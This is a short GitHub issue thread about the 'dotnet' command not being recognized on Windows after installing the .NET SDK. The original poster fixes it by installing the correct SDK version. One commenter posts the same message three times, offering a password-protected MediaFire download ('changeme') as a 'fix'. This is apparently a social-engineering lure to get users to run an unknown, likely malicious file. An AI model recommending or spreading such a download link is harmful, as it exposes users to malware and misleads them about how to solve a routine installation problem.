### ISSUE TITLE
The term 'dotnet' is not recognized as the name of a cmdlet, function, script file, or operable program.

### ISSUE THREAD

**Issue by jessicaortegar** [dotnet/website-feedback#228]
### URL

https://dotnet.microsoft.com/en-us/learn/dotnet/hello-world-tutorial/install

### Operating system

windows

### Description

After installing .net SDK (and restarting my computer), when I try "dotnet" in the command prompt, the following message appears: "'dotnet' is not recognized as an internal or external command,
operable program or batch file." 
I checked that .Net SDK is indeed installed on my computer, so I don't know what might be the issue.

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by jessicaortegar** [comment]
I fixed the error; I didn't install the correct version for my computer.

**Comment by mairaw** [comment]
I'm glad you fixed.
